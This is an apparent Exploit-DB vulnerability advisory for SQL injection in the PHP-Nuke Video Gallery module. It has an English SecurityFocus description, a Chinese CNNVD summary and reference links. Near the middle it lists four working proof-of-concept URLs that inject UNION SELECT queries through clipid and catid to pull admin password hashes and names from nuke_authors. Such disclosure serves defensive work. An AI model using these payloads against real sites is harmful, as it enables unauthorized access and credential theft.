https://www.exploit-db.com/exploits/24060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-095

PHP-NukeVideoGalleryModule0.1Beta5版本中的modules.php存在SQL注入漏洞。远程攻击者可以通过在viewclip，viewcat，或voteclip行动中的(1)clipid或(2)catid参数来执行任意SQL代码。

source: http://www.securityfocus.com/bid/10215/info

Reportedly the PHP-Nuke Video Gallery module is affected by multiple SQL injection vulnerabilities. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query.

These issues may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

http://www.example.com/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
http://www.example.com/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
http://www.example.com/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
http://www.example.com/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

来源:XF
名称:video-gallery-sql-injection(15979)
链接:http://xforce.iss.net/xforce/xfdb/15979
来源:BID
名称:10215
链接:http://www.securityfocus.com/bid/10215
来源:BUGTRAQ
名称:20040426MultiplevulnerabilitiesPHP-NukeVideoGalleryModuleforPHP-Nuke
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108308660628557&w;=2